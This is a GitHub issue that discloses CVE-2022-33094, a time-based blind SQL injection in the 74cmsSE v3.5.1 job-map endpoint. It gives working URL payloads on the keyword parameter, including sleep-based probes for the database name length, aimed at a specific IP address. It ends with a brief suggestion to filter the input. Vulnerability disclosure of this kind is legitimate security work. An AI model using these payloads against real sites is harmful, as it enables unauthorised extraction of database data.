CVE-2022-33094: SQL Injection vulnerability · Issue #4 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link：http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.

POC:
Payload：
/v1_0/home/job/map?keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1

In the path
/v1_0/home/job/map
is not strictly filtered for $keyword, resulting in SQL injection

exp1:
http://124.223.95.129:8766/v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1

As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above it is possible to delay the function being executed twice out of 2
Time blinds are possible to guess the length of the database:
exp2:
http://124.223.95.129:8766v1_0/home/job/map?keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&north_east_lat=1&north_east_lng=11&page=1&pagesize=5&south_west_lat=1&south_west_lng=1

As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is “qscms2” , and the delay as exactly double the length of database(), so the injection is successfull

It’s a time-based SQL injection
Suggest: Add a filter function to this parameter